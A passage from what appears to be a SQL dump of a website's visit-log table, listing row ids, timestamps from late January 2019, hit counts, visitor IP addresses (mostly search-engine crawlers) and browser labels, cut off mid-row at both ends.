1548797326,1,1,0,0,'54.36.149.95','other'),(379374,1548797558,1,1,0,0,'46.229.168.143','other'),(379375,1548797651,1,1,0,0,'54.36.149.14','other'),(379376,1548797812,1,1,0,0,'66.249.69.126','chrome'),(379377,1548798033,1,1,0,0,'207.241.231.170','other'),(379378,1548798076,1,1,0,0,'54.36.149.25','other'),(379379,1548798144,1,1,0,0,'54.36.149.26','other'),(379380,1548798195,1,1,0,0,'66.249.69.74','chrome'),(379381,1548798262,1,1,0,0,'54.36.148.227','other'),(379382,1548798888,1,1,0,0,'46.229.168.142','other'),(379383,1548798908,2,2,0,0,'207.46.13.91','other'),(379384,1548798935,1,1,0,0,'207.241.231.170','other'),(379385,1548799168,1,1,0,0,'66.249.69.126','chrome'),(379386,1548799238,3,3,0,0,'216.244.66.241','other'),(379387,1548799908,1,1,0,0,'54.36.148.23','other'),(379388,1548800217,1,1,0,0,'54.36.148.200','other'),(379389,1548800410,3,3,0,0,'66.249.69.74','chrome'),(379390,1548800522,1,1,0,0,'46.229.168.151','other'),(379391,1548800627,1,1,0,0,'54.36.148.141','other'),(379392,1548800686,1,1,0,0,'207.46.13.91','other'),(379393,1548800989,3,3,0,0,'66.249.69.126','chrome'),(379394,1548801035,1,1,0,0,'54.36.148.179','other'),(379395,1548801417,1,1,0,0,'66.249.69.72','chrome'),(379396,1548801577,1,1,0,0,'66.249.69.122','chrome'),(379397,1548801599,2,2,0,0,'216.244.66.241','other'),(379398,1548801686,1,1,0,0,'66.249.69.124','chrome'),(379399,1548801697,1,1,0,0,'66.249.69.74','chrome'),(379400,1548801850,2,2,0,0,'144.76.38.40','other'),(379401,1548801989,1,1,0,0,'54.36.149.98','other'),(379402,1548802311,1,1,0,0,'46.229.168.154','other'),(379403,1548802338,1,1,0,0,'54.36.148.223','other'),(379404,1548802713,1,1,0,0,'40.77.167.178','other'),(379405,1548802795,1,1,0,0,'54.36.148.86','other'),(379406,1548802797,1,1,0,0,'54.36.149.7','other'),(379407,1548802801,2,2,0,0,'66.249.69.74','chrome'),(379408,1548802997,1,1,0,0,'66.249.69.126','chrome'),(379409,1548803138,1,1,0,0,'54.36.149.90','other'),(379410,1548804466,1,1,0,0,'54.36.149.14','other'),(379411,1548804673,1,1,0,0,'8.29.198.26','other'),(379412,1548804686,4,4,0,0,'216.244.66.241','other'),(379413,1548804722,1,1,0,0,'54.36.149.9','other'),(379414,1548804796,2,2,0,0,'66.249.69.122','chrome'),(379415,1548804861,1,1,0,0,'54.36.148.242','other'),(379416,1548804928,1,1,0,0,'207.46.13.91','other'),(379417,1548804947,2,2,0,0,'66.249.69.72','chrome'),(379418,1548804954,2,2,0,0,'66.249.69.126','chrome'),(379419,1548805124,1,1,0,0,'66.249.69.124','chrome'),(379420,1548805770,1,1,0,0,'54.36.149.21','other'),(379421,1548806203,1,1,0,0,'216.244.66.241','other'),(379422,1548806707,1,1,0,0,'46.229.168.145','other'),(379423,1548806720,1,1,0,0,'8.29.198.26','other'),(379424,1548807044,1,1,0,0,'54.36.149.4','other'),(379425,1548807484,2,2,0,0,'216.244.66.241','other'),(379426,1548807565,1,1,0,0,'157.55.39.143','other'),(379427,1548807736,1,1,0,0,'54.36.148.17','other'),(379428,1548807928,1,1,0,0,'54.36.148.99','other'),(379429,1548808485,1,1,0,0,'40.77.167.49','other'),(379430,1548808649,1,1,0,0,'207.46.13.91','other'),(379431,1548808966,1,1,0,0,'54.36.148.148','other'),(379432,1548809311,1,1,0,0,'54.36.149.13','other'),(379433,1548809409,1,1,0,0,'39.98.176.120','other'),(379434,1548809482,1,1,0,0,'54.36.149.47','other'),(379435,1548809714,2,2,0,0,'46.229.168.137','other'),(379436,1548809758,1,1,0,0,'87.118.112.63','other'),(379437,1548810119,1,1,0,0,'54.36.149.64','other'),(379438,1548810511,1,1,0,0,'40.77.167.14','other'),(379439,1548810533,3,3,0,0,'216.244.66.241','other'),(379440,1548810586,1,1,0,0,'54.36.148.129','other'),(379441,1548810888,1,1,0,0,'5.45.207.79','other'),(379442,1548810973,1,1,0,0,'5.45.207.19','other'),(379443,1548811065,1,1,0,0,'54.36.148.39','other'),(379444,1548811091,2,2,0,0,'69.30.213.82','other'),(379445,1548811471,1,1,0,0,'54.36.148.147','other'),(379446,1548811630,1,1,0,0,'95.108.213.4','other'),(379447,1548811912,1,1,0,0,'180.163.220.68','other'),(379448,1548811920,2,2,0,0,'180.163.220.3','other'),(379449,1548811951,1,1,0,0,'180.163.220.66','other'),(379450,1548812046,2,2,0,0,'207.46.13.91','other'),(379451,1548812477,1,1,0,0,'54.36.148.230','other'),(379452,1548812518,1,1,0,0,'216.244.66.241','other'),(379453,1548812581,1,1,0,0,'54.36.148.206','other'),(379454,1548813178,1,1,0,0,'54.36.148.141','other'),(379455,1548813630,1,1,0,0,'54.36.148.51','other'),(379456,1548813641,1,1,0,0,'5.255.253.38','other'),(379457,1548813709,1,1,0,0,'54.36.149.74','other'),(379458,1548813782,1,1,0,0,'54.36.149.40','other'),(379459,1548813944,1,1,0,0,'54.36.148.134','other'),(379460,1548815196,1,1,0,0,'54.36.148.144','other'),(379461,1548815360,1,1,0,0,'54.36.148.36','other'),(379462,1548815506,1,1,0,0,'8.29.198.25','other'),(379463,1548815938,1,1,0,0,'46.229.168.147','other'),(379464,1548816201,1,1,0,0,'37.9.113.148','other'),(379465,1548816233,2,2,0,0,'216.244.66.241','other'),(379466,1548816418,2,2,0,0,'5.45.207.19','other'),(379467,1548816579,1,1,0,0,'171.13.14.3','other'),(379468,1548816695,1,1,0,0,'157.55.39.218','other'),(379469,1548817143,1,1,0,0,'54.36.148.229','other'),(379470,1548817287,1,1,0,0,'66.249.69.72','chrome'),(379471,1548817345,1,1,0,0,'66.249.69.122','chrome'),(379472,1548817438,1,1,0,0,'5.45.207.19','other'),(379473,1548817479,2,2,0,0,'54.36.148.223','other'),(379474,1548817560,1,1,0,0,'8.29.198.26','other'),(379475,1548817777,1,1,0,0,'66.249.69.124','chrome'),(379476,1548817778,1,1,0,0,'54.36.148.243','other'),(379477,1548818104,1,1,0,0,'66.249.69.74','chrome'),(379478,1548818212,1,1,0,0,'66.249.69.126','chrome'),(379479,1548818346,1,1,0,0,'54.36.149.56','other'),(379480,1548818806,1,1,0,0,'35.175.196.233','chrome'),(379481,1548818844,1,1,0,0,'5.45.207.19','other'),(379482,1548818862,1,1,0,0,'100.25.182.161','chrome'),(379483,1548818914,1,1,0,0,'46.229.168.146','other'),(379484,1548818978,1,1,0,0,'180.76.15.140','other'),(379485,1548819529,1,1,0,0,'207.46.13.188','other'),(379486,1548819536,1,1,0,0,'74.120.221.252','chrome'),(379487,1548819726,1,1,0,0,'54.36.149.101','other'),(379488,1548819737,1,1,0,0,'54.36.148.200','other'),(379489,1548820140,1,1,0,0,'46.229.168.134','other'),(379490,1548820474,1,1,0,0,'54.36.148.149','other'),(379491,1548820490,1,1,0,0,'46.229.168.142','other'),(379492,1548820537,2,2,0,0,'216.244.66.241','other'),(379493,1548820935,1,1,0,0,'54.36.148.224','other'),(379494,1548821132,1,1,0,0,'54.36.148.52','other'),(379495,1548821139,1,1,0,0,'54.36.148.93','other'),(379496,1548821377,1,1,0,0,'54.36.148.84','other'),(379497,1548821836,1,1,0,0,'207.46.13.188','other'),(379498,1548821892,1,1,0,0,'216.244.66.241','other'),(379499,1548822126,1,1,0,0,'37.9.113.103','other'),(379500,1548822149,1,1,0,0,'54.36.148.169','other'),(379501,1548822802,1,1,0,0,'54.36.149.81','other'),(379502,1548822809,1,1,0,0,'54.36.148.114','other'),(379503,1548823137,1,1,0,0,'178.154.244.11','other'),(379504,1548823458,1,1,0,0,'54.36.149.54','other'),(379505,1548823563,1,1,0,0,'66.249.69.124','chrome'),(379506,1548823606,2,2,0,0,'216.244.66.241','other'),(379507,1548823879,1,1,0,0,'54.36.148.151','other'),(379508,1548824365,1,1,0,0,'66.249.69.122','chrome'),(379509,1548824765,1,1,0,0,'40.77.167.196','other'),(379510,1548824937,1,1,0,0,'46.229.168.144','other'),(379511,1548825214,1,1,0,0,'157.55.39.218','other'),(379512,1548825260,26,26,0,0,'149.202.82.11','other'),(379513,1548826185,28,28,0,0,'149.202.82.11','other'),(379514,1548826196,2,2,0,0,'54.214.106.159','chrome'),(379515,1548826257,11,11,0,0,'66.249.69.122','chrome'),(379516,1548826315,1,1,0,0,'216.244.66.241','other'),(379517,1548826338,1,1,0,0,'8.29.198.27','other'),(379518,1548826394,1,1,0,0,'66.249.69.126','chrome'),(379519,1548826453,1,1,0,0,'46.229.168.153','other'),(379520,1548826732,1,1,0,0,'46.229.168.149','other'),(379521,1548827032,5,5,0,0,'66.249.69.124','chrome'),(379522,1548827084,1,1,0,0,'54.36.148.153','other'),(379523,1548827115,7,7,0,0,'149.202.82.11','other'),(379524,1548827167,32,32,0,0,'66.249.69.122','chrome'),(379525,1548827238,1,1,0,0,'207.46.13.188','other'),(379526,1548827474,1,1,0,0,'66.249.69.126','chrome'),(379527,1548827764,1,1,0,0,'91.196.178.173','chrome'),(379528,1548827973,1,1,0,0,'54.36.149.73','other'),(379529,1548828088,2,2,0,0,'216.244.66.241','other'),(379530,1548828399,1,1,0,0,'46.229.168.143','other'),(379531,1548828402,1,1,0,0,'8.29.198.25','other'),(379532,1548828498,1,1,0,0,'207.46.13.201','other'),(379533,1548828907,1,1,0,0,'51.15.112.94','other'),(379534,1548828940,1,1,0,0,'54.36.149.18','other'),(379535,1548829202,1,1,0,0,'46.229.168.150','other'),(379536,1548829258,1,1,0,0,'54.36.148.151','other'),(379537,1548829429,1,1,0,0,'54.36.148.130','other'),(379538,1548829505,1,1,0,0,'54.36.148.174','other'),(379539,1548829603,1,1,0,0,'216.244.66.241','other'),(379540,1548829910,1,1,0,0,'54.36.148.167','other'),(379541,1548830027,1,1,0,0,'46.229.168.137','other'),(379542,1548830680,1,1,0,0,'66.249.69.122','chrome'),(379543,1548830690,1,1,0,0,'157.55.39.120','other'),(379544,1548830857,1,1,0,0,'46.229.168.150','other'),(379545,1548831072,2,2,0,0,'66.249.69.124','chrome'),(379546,1548831074,1,1,0,0,'54.36.149.25','other'),(379547,1548831157,3,3,0,0,'216.244.66.241','other'),(379548,1548831239,1,1,0,0,'40.77.167.81','other'),(379549,1548831296,1,1,0,0,'199.58.86.209','other'),(379550,1548831877,1,1,0,0,'46.229.168.147','other'),(379551,1548831892,1,1,0,0,'54.36.148.144','other'),(379552,1548832035,1,1,0,0,'46.229.168.133','other'),(379553,1548832051,1,1,0,0,'54.36.148.181','other'),(379554,1548832080,3,3,0,0,'216.244.66.241','other'),(379555,1548832311,1,1,0,0,'66.249.69.74','chrome'),(379556,1548832407,1,1,0,0,'46.229.168.140','other'),(379557,1548832412,1,1,0,0,'66.249.69.72','chrome'),(379558,1548832571,1,1,0,0,'66.249.69.122','chrome'),(379559,1548832837,1,1,0,0,'46.229.168.145','other'),(379560,1548832870,1,1,0,0,'54.36.148.48','other'),(379561,1548833055,1,1,0,0,'54.36.148.161','other'),(379562,1548833592,1,1,0,0,'95.132.4.84','firefox'),(379563,1548833875,1,1,0,0,'91.196.178.66','chrome'),(379564,1548833910,1,1,0,0,'54.36.148.179','other'),(379565,1548834595,1,1,0,0,'54.234.24.156','chrome'),(379566,1548834600,1,1,0,0,'18.233.150.221','chrome'),(379567,1548834736,2,2,0,0,'216.244.66.241','other'),(379568,1548834920,1,1,0,0,'54.36.148.85','other'),(379569,1548835592,1,1,0,0,'54.36.149.28','other'),(379570,1548836239,1,1,0,0,'46.229.168.133','other'),(379571,1548836348,1,1,0,0,'46.229.168.134','other'),(379572,1548836730,1,1,0,0,'193.30.34.35','chrome'),(379573,1548836903,1,1,0,0,'207.46.13.188','other'),(379574,1548837056,1,1,0,0,'91.196.178.66','chrome'),(379575,1548837095,1,1,0,0,'46.229.168.152','other'),(379576,1548837173,1,1,0,0,'8.29.198.27','other'),(379577,1548837544,1,1,0,0,'91.196.178.168','chrome'),(379578,1548837744,1,1,0,0,'66.249.69.124','chrome'),(379579,1548838068,1,1,0,0,'13.66.139.0','other'),(379580,1548838118,1,1,0,0,'87.250.224.81','other'),(379581,1548838754,1,1,0,0,'46.229.168.141','other'),(379582,1548838833,1,1,0,0,'91.196.178.66','chrome'),(379583,1548838948,1,1,0,0,'107.20.1.188','chrome'),(379584,1548839128,1,1,0,0,'54.36.149.99','other'),(379585,1548839244,1,1,0,0,'8.29.198.25','other'),(379586,1548839570,1,1,0,0,'46.133.217.0','chrome'),(379587,1548839670,1,1,0,0,'92.112.227.140','chrome'),(379588,1548840432,1,1,0,0,'54.36.148.83','other'),(379589,1548840723,1,1,0,0,'216.244.66.241','other'),(379590,1548841076,1,1,0,0,'54.36.148.231','other'),(379591,1548841619,1,1,0,0,'46.229.168.147','other'),(379592,1548841640,1,1,0,0,'54.36.149.93','other'),(379593,1548842317,1,1,0,0,'54.36.148.78','other'),(379594,1548842343,1,1,0,0,'91.196.178.66','chrome'),(379595,1548842833,2,2,0,0,'95.213.141.126','opera'),(379596,1548842897,1,1,0,0,'54.36.148.57','other'),(379597,1548843373,4,4,0,0,'216.244.66.241','other'),(379598,1548843589,1,1,0,0,'180.76.15.152','other'),(379599,1548843872,1,1,0,0,'54.36.148.111','other'),(379600,1548844310,1,1,0,0,'46.229.168.154','other'),(379601,1548844355,1,1,0,0,'54.36.148.18','other'),(379602,1548844544,1,1,0,0,'40.77.167.19','other'),(379603,1548844655,1,1,0,0,'54.36.148.117','other'),(379604,1548844807,3,3,0,0,'5.3.215.0','firefox'),(379605,1548844809,1,1,0,0,'54.36.148.148','other'),(379606,1548845086,1,1,0,0,'54.36.148.33','other'),(379607,1548845135,2,2,0,0,'216.244.66.241','other'),(379608,1548845689,1,1,0,0,'46.229.168.140','other'),(379609,1548845881,2,2,0,0,'95.132.26.209','chrome'),(379610,1548845992,3,3,0,0,'178.249.245.55','firefox'),(379611,1548846108,1,1,0,0,'95.132.4.84','firefox'),(379612,1548846312,1,1,0,0,'54.36.149.26','other'),(379613,1548846474,1,1,0,0,'5.45.207.79','other'),(379614,1548846562,1,1,0,0,'157.55.39.82','other'),(379615,1548846892,1,1,0,0,'92.112.227.140','chrome'),(379616,1548847604,3,3,0,0,'178.46.159.121','firefox'),(379617,1548848022,1,1,0,0,'8.29.198.26','other'),(379618,1548848047,1,1,0,0,'54.36.148.35','other'),(379619,1548848139,1,1,0,0,'66.249.69.74','chrome'),(379620,1548848592,4,4,0,0,'216.244.66.241','other'),(379621,1548849146,1,1,0,0,'54.36.148.172','other'),(379622,1548849537,3,3,0,0,'94.25.171.178','firefox'),(379623,1548849697,1,1,0,0,'54.36.149.100','other'),(379624,1548849742,1,1,0,0,'91.218.195.165','chrome'),(379625,1548849763,1,1,0,0,'46.229.168.154','other'),(379626,1548849829,1,1,0,0,'95.132.26.209','chrome'),(379627,1548849989,1,1,0,0,'216.244.66.241','other'),(379628,1548850092,1,1,0,0,'8.29.198.27','other'),(379629,1548850175,1,1,0,0,'91.196.178.81','firefox'),(379630,1548850343,1,1,0,0,'54.36.149.38','other'),(379631,1548850412,1,1,0,0,'54.36.148.102','other'),(379632,1548851501,1,1,0,0,'46.229.168.135','other'),(379633,1548851507,1,1,0,0,'216.244.66.241','other'),(379634,1548851622,2,2,0,0,'91.196.178.66','chrome'),(379635,1548852058,3,3,0,0,'212.154.182.2','firefox'),(379636,1548852069,1,1,0,0,'46.229.168.132','other'),(379637,1548852645,1,1,0,0,'80.254.155.43','chrome'),(379638,1548852929,1,1,0,0,'54.36.149.57','other'),(379639,1548853155,1,1,0,0,'91.196.178.66','chrome'),(379640,1548853674,1,1,0,0,'91.196.178.188','chrome'),(379641,1548854454,1,1,0,0,'91.196.178.172','chrome'),(379642,1548854891,1,1,0,0,'180.76.15.9','other'),(379643,1548854913,1,1,0,0,'46.229.168.142','other'),(379644,1548855114,1,1,0,0,'46.229.168.134','other'),(379645,1548855170,1,1,0,0,'157.55.39.253','other'),(379646,1548855291,1,1,0,0,'178.92.170.224','chrome'),(379647,1548855311,1,1,0,0,'95.132.141.146','chrome'),(379648,1548855713,1,1,0,0,'46.48.13.161','other'),(379649,1548855724,1,1,0,0,'95.132.26.209','chrome'),(379650,1548855916,1,1,0,0,'54.36.149.7','other'),(379651,1548856063,2,2,0,0,'91.196.178.81','firefox'),(379652,1548856449,1,1,0,0,'54.36.148.181','other'),(379653,1548856482,1,1,0,0,'54.36.148.82','other'),(379654,1548856631,1,1,0,0,'66.249.69.126','chrome'),(379655,1548856675,6,6,0,0,'66.249.69.124','chrome'),(379656,1548856735,8,8,0,0,'66.249.69.122','chrome'),(379657,1548856771,1,1,0,0,'46.229.168.135','other'),(379658,1548857065,5,5,0,0,'66.249.69.72','chrome'),(379659,1548857107,3,3,0,0,'66.249.69.74','chrome'),(379660,1548857280,1,1,0,0,'54.36.148.147','other'),(379661,1548857345,1,1,0,0,'54.36.148.68','other'),(379662,1548857444,1,1,0,0,'46.229.168.143','other'),(379663,1548857609,1,1,0,0,'66.249.69.124','chrome'),(379664,1548857653,2,2,0,0,'66.249.69.122','chrome'),(379665,1548857709,1,1,0,0,'5.45.207.79','other'),(379666,1548857722,1,1,0,0,'46.229.168.150','other'),(379667,1548857834,1,1,0,0,'91.196.178.65','firefox'),(379668,1548858151,1,1,0,0,'95.134.116.78','chrome'),(379669,1548858740,1,1,0,0,'91.196.178.92','chrome'),(379670,1548858870,1,1,0,0,'8.29.198.27','other'),(379671,1548858912,1,1,0,0,'54.36.148.12','other'),(379672,1548859006,1,1,0,0,'54.36.148.196','other'),(379673,1548859565,2,2,0,0,'66.249.69.122','chrome'),(379674,1548859776,1,1,0,0,'40.77.167.5','other'),(379675,1548859834,1,1,0,0,'93.183.196.184','chrome'),(379676,1548859926,1,1,0,0,'199.58.86.206','other'),(379677,1548859940,1,1,0,0,'216.244.66.241','other'),(379678,1548859955,1,1,0,0,'54.36.149.3','other'),(379679,1548860353,1,1,0,0,'54.36.149.61','other'),(379680,1548860408,1,1,0,0,'46.48.13.161','other'),(379681,1548860635,1,1,0,0,'91.196.178.66','chrome'),(379682,1548860727,1,1,0,0,'193.24.221.34','chrome'),(379683,1548860817,1,1,0,0,'66.249.69.74','chrome'),(379684,1548860932,1,1,0,0,'46.229.168.130','other'),(379685,1548860935,1,1,0,0,'8.29.198.27','other'),(379686,1548861111,1,1,0,0,'46.229.168.133','other'),(379687,1548861129,1,1,0,0,'54.36.148.198','other'),(379688,1548861421,1,1,0,0,'216.244.66.241','other'),(379689,1548861614,1,1,0,0,'66.249.69.126','chrome'),(379690,1548861646,1,1,0,0,'66.249.69.124','chrome'),(379691,1548861771,1,1,0,0,'40.77.167.70','other'),(379692,1548861809,1,1,0,0,'54.36.149.86','other'),(379693,1548861913,1,1,0,0,'46.229.168.140','other'),(379694,1548862212,1,1,0,0,'37.53.123.48','chrome'),(379695,1548862276,1,1,0,0,'188.163.18.96','chrome'),(379696,1548862730,1,1,0,0,'66.249.69.122','chrome'),(379697,1548862742,1,1,0,0,'180.76.15.150','other'),(379698,1548862826,1,1,0,0,'54.36.149.66','other'),(379699,1548863169,1,1,0,0,'66.249.69.72','chrome'),(379700,1548863395,1,1,0,0,'66.249.69.126','chrome'),(379701,1548863770,1,1,0,0,'216.244.66.241','other'),(379702,1548864419,1,1,0,0,'54.36.149.2','other'),(379703,1548864437,1,1,0,0,'46.229.168.148','other'),(379704,1548864827,1,1,0,0,'31.184.238.56','chrome'),(379705,1548865101,1,1,0,0,'40.77.167.5','other'),(379706,1548865907,1,1,0,0,'54.36.148.32','other'),(379707,1548866417,1,1,0,0,'66.249.69.124','chrome'),(379708,1548866534,1,1,0,0,'66.249.69.122','chrome'),(379709,1548867355,1,1,0,0,'54.36.148.234','other'),(379710,1548867461,1,1,0,0,'54.36.148.94','other'),(379711,1548867712,1,1,0,0,'66.249.69.122','chrome'),(379712,1548868313,1,1,0,0,'46.229.168.129','other'),(379713,1548868651,1,1,0,0,'91.196.178.47','chrome'),(379714,1548869029,1,1,0,0,'54.36.148.149','other'),(379715,1548869142,1,1,0,0,'66.249.69.126','chrome'),(379716,1548869155,1,1,0,0,'66.249.69.74','chrome'),(379717,1548869164,1,1,0,0,'66.249.69.124','chrome'),(379718,1548869281,1,1,0,0,'54.36.149.52','other'),(379719,1548869473,1,1,0,0,'46.229.168.153','other'),(379720,1548869721,1,1,0,0,'8.29.198.25','other'),(379721,1548869865,1,1,0,0,'91.209.11.236','other'),(379722,1548870090,2,2,0,0,'216.244.66.241','other'),(379723,1548870547,1,1,0,0,'46.229.168.153','other'),(379724,1548870882,1,1,0,0,'178.92.75.180','chrome'),(379725,1548871778,1,1,0,0,'8.29.198.27','other'),(379726,1548872275,1,1,0,0,'46.229.168.150','other'),(379727,1548872449,1,1,0,0,'54.36.148.110','other'),(379728,1548873012,1,1,0,0,'180.76.15.33','other'),(379729,1548873017,1,1,0,0,'46.229.168.147','other'),(379730,1548873070,1,1,0,0,'54.36.148.222','other'),(379731,1548873217,1,1,0,0,'46.211.113.166','chrome'),(379732,1548873305,3,3,0,0,'216.244.66.241','other'),(379733,1548873498,1,1,0,0,'46.229.168.137','other'),(379734,1548873625,1,1,0,0,'54.36.148.145','other'),(379735,1548874579,1,0,1,0,'66.249.79.161',''),(379736,1548875130,1,1,0,0,'66.249.69.74','chrome'),(379737,1548875543,1,1,0,0,'216.244.66.241','other'),(379738,1548875767,1,1,0,0,'54.36.148.63','other'),(379739,1548875968,2,2,0,0,'204.12.197.234','other'),(379740,1548876118,1,1,0,0,'54.36.148.225','other'),(379741,1548876538,1,0,1,0,'66.249.69.74',''),(379742,1548876580,1,1,0,0,'216.244.66.241','other'),(379743,1548877046,1,1,0,0,'54.36.148.73','other'),(379744,1548877418,1,1,0,0,'54.36.148.125','other'),(379745,1548877571,1,1,0,0,'54.36.148.39','other'),(379746,1548877840,1,1,0,0,'216.244.66.241','other'),(379747,1548878424,1,1,0,0,'54.36.148.130','other'),(379748,1548878651,1,1,0,0,'54.36.148.20','other'),(379749,1548878982,1,1,0,0,'54.36.149.66','other'),(379750,1548880505,1,1,0,0,'54.36.149.32','other'),(379751,1548880561,1,1,0,0,'8.29.198.25','other'),(379752,1548880609,1,1,0,0,'54.36.148.232','other'),(379753,1548880628,1,1,0,0,'157.55.39.181','other'),(379754,1548881351,2,2,0,0,'216.244.66.241','other'),(379755,1548881490,1,1,0,0,'54.36.148.161','other'),(379756,1548881615,1,1,0,0,'46.229.168.139','other'),(379757,1548881741,1,1,0,0,'54.36.148.158','other'),(379758,1548881795,1,1,0,0,'54.36.148.17','other'),(379759,1548882056,1,1,0,0,'178.154.244.11','other'),(379760,1548882353,1,1,0,0,'54.36.148.80','other'),(379761,1548882427,2,2,0,0,'207.46.13.39','other'),(379762,1548882620,1,1,0,0,'8.29.198.27','other'),(379763,1548882690,1,1,0,0,'141.8.183.23','other'),(379764,1548883158,1,1,0,0,'157.55.39.181','other'),(379765,1548883379,1,1,0,0,'178.17.171.194','firefox'),(379766,1548883579,1,1,0,0,'66.249.69.122','chrome'),(379767,1548883884,2,2,0,0,'216.244.66.241','other'),(379768,1548884019,1,1,0,0,'207.46.13.39','other'),(379769,1548884096,1,1,0,0,'54.36.149.21','other'),(379770,1548884752,1,1,0,0,'37.73.208.198','chrome'),(379771,1548885336,1,1,0,0,'46.229.168.150','other'),(379772,1548885924,2,2,0,0,'216.244.66.241','other'),(379773,1548885963,1,1,0,0,'157.55.39.181','other'),(379774,1548886980,3,3,0,0,'216.244.66.241','other'),(379775,1548887608,1,1,0,0,'66.249.69.74','chrome'),(379776,1548887699,1,1,0,0,'52.53.201.78','chrome'),(379777,1548888231,1,1,0,0,'46.229.168.145','other'),(379778,1548888453,2,2,0,0,'207.46.13.39','other'),(379779,1548888757,1,1,0,0,'87.250.224.81','other'),(379780,1548889159,2,2,0,0,'216.244.66.241','other'),(379781,1548890011,1,1,0,0,'66.249.69.122','chrome'),(379782,1548891197,2,2,0,0,'207.46.13.39','other'),(379783,1548891399,1,1,0,0,'8.29.198.26','other'),(379784,1548891593,2,2,0,0,'192.99.247.1','other'),(379785,1548891645,2,2,0,0,'40.77.167.5','other'),(379786,1548891741,1,1,0,0,'46.229.168.132','other'),(379787,1548891794,1,1,0,0,'46.229.168.140','other'),(379788,1548892094,1,1,0,0,'216.244.66.241','other'),(379789,1548892434,1,1,0,0,'206.189.86.127','other'),(379790,1548892561,1,1,0,0,'157.55.39.181','other'),(379791,1548892968,1,1,0,0,'46.229.168.153','other'),(379792,1548893014,1,1,0,0,'141.8.183.23','other'),(379793,1548893439,2,2,0,0,'5.45.207.79','other'),(379794,1548893458,1,1,0,0,'8.29.198.26','other'),(379795,1548893657,1,1,0,0,'141.8.132.16','other'),(379796,1548894613,3,3,0,0,'216.244.66.241','other'),(379797,1548895277,1,1,0,0,'46.229.168.146','other'),(379798,1548895824,2,2,0,0,'207.46.13.207','other'),(379799,1548896120,1,1,0,0,'31.220.0.225','other'),(379800,1548896768,1,1,0,0,'207.46.13.207','other'),(379801,1548896833,3,3,0,0,'216.244.66.241','other'),(379802,1548898414,1,1,0,0,'54.36.148.218','other'),(379803,1548898455,1,1,0,0,'139.162.72.149','firefox'),(379804,1548898983,1,1,0,0,'54.36.148.206','other'),(379805,1548899047,1,1,0,0,'40.77.167.20','other'),(379806,1548899274,1,1,0,0,'46.229.168.151','other'),(379807,1548899344,1,1,0,0,'54.36.148.199','other'),(379808,1548899397,1,1,0,0,'54.36.148.58','other'),(379809,1548899502,1,1,0,0,'54.36.148.157','other'),(379810,1548899519,2,2,0,0,'216.244.66.241','other'),(379811,1548899572,1,1,0,0,'46.229.168.143','other'),(379812,1548899813,1,1,0,0,'46.229.168.147','other'),(379813,1548900176,1,1,0,0,'54.36.148.240','other'),(379814,1548900506,1,1,0,0,'207.46.13.160','other'),(379815,1548900665,1,1,0,0,'46.229.168.133','other'),(379816,1548900726,1,1,0,0,'216.244.66.241','other'),(379817,1548900951,1,1,0,0,'54.36.148.218','other'),(379818,1548901564,1,1,0,0,'54.36.148.32','other'),(379819,1548902094,1,1,0,0,'54.36.149.8','other'),(379820,1548902244,1,1,0,0,'8.29.198.26','other'),(379821,1548902418,1,1,0,0,'180.76.15.163','other'),(379822,1548902571,2,2,0,0,'216.244.66.241','other'),(379823,1548903151,1,1,0,0,'54.36.148.109','other'),(379824,1548903209,1,1,0,0,'54.36.149.80','other'),(379825,1548903831,2,2,0,0,'216.244.66.241','other'),(379826,1548904302,1,1,0,0,'8.29.198.27','other'),(379827,1548904824,1,1,0,0,'54.36.149.82','other'),(379828,1548905171,1,1,0,0,'46.229.168.136','other'),(379829,1548905360,1,1,0,0,'54.36.148.38','other'),(379830,1548905651,1,1,0,0,'66.249.69.122','chrome'),(379831,1548905997,1,1,0,0,'54.36.148.159','other'),(379832,1548906085,1,1,0,0,'66.249.69.124','chrome'),(379833,1548906184,2,2,0,0,'66.249.69.126','chrome'),(379834,1548906283,1,1,0,0,'54.36.148.182','other'),(379835,1548906528,1,1,0,0,'157.55.39.102','other'),(379836,1548906647,1,1,0,0,'66.249.69.122','chrome'),(379837,1548907214,1,1,0,0,'54.36.148.169','other'),(379838,1548907274,1,1,0,0,'96.66.15.147','chrome'),(379839,1548907327,1,1,0,0,'54.36.149.79','other'),(379840,1548908009,1,1,0,0,'54.36.148.49','other'),(379841,1548908180,1,1,0,0,'54.36.148.220','other'),(379842,1548908181,3,3,0,0,'66.249.69.74','chrome'),(379843,1548908189,22,22,0,0,'66.249.69.122','chrome'),(379844,1548908219,5,5,0,0,'66.249.69.124','chrome'),(379845,1548908256,4,4,0,0,'66.249.69.126','chrome'),(379846,1548908519,2,2,0,0,'216.244.66.241','other'),(379847,1548908915,1,1,0,0,'66.249.69.72','chrome'),(379848,1548909108,1,1,0,0,'66.249.69.74','chrome'),(379849,1548909118,1,1,0,0,'66.249.69.122','chrome'),(379850,1548909125,2,2,0,0,'66.249.69.124','chrome'),(379851,1548909356,1,1,0,0,'66.249.69.126','chrome'),(379852,1548909366,1,1,0,0,'157.55.39.102','other'),(379853,1548909803,1,1,0,0,'54.36.148.194','other'),(379854,1548910141,1,1,0,0,'54.36.149.107','other'),(379855,1548911191,1,1,0,0,'54.36.148.91','other'),(379856,1548911480,1,1,0,0,'54.36.149.107','other'),(379857,1548911673,1,1,0,0,'54.36.148.109','other'),(379858,1548911893,1,1,0,0,'46.229.168.134','other'),(379859,1548912007,1,1,0,0,'158.46.220.202','chrome'),(379860,1548912027,2,2,0,0,'157.55.39.102','other'),(379861,1548912108,1,1,0,0,'207.46.13.160','other'),(379862,1548912755,1,1,0,0,'46.229.168.143','other'),(379863,1548913080,1,1,0,0,'8.29.198.27','other'),(379864,1548913091,2,2,0,0,'18.237.186.207','chrome'),(379865,1548913328,1,1,0,0,'157.55.39.102','other'),(379866,1548913357,1,1,0,0,'178.63.68.137','firefox'),(379867,1548913462,1,1,0,0,'66.249.69.124','chrome'),(379868,1548913552,2,2,0,0,'216.244.66.241','other'),(379869,1548913702,3,3,0,0,'66.249.69.126','chrome'),(379870,1548913824,1,1,0,0,'54.36.149.95','other'),(379871,1548914001,1,1,0,0,'54.36.148.194','other'),(379872,1548914083,1,1,0,0,'207.46.13.160','other'),(379873,1548914090,1,1,0,0,'46.229.168.151','other'),(379874,1548914546,1,1,0,0,'46.229.168.132','other'),(379875,1548915017,1,1,0,0,'216.244.66.241','other'),(379876,1548915163,1,1,0,0,'8.29.198.25','other'),(379877,1548915196,1,1,0,0,'89.40.2.91','other'),(379878,1548915204,1,1,0,0,'54.36.148.227','other'),(379879,1548915258,1,1,0,0,'54.36.148.240','other'),(379880,1548915489,1,1,0,0,'66.249.69.74','chrome'),(379881,1548916055,1,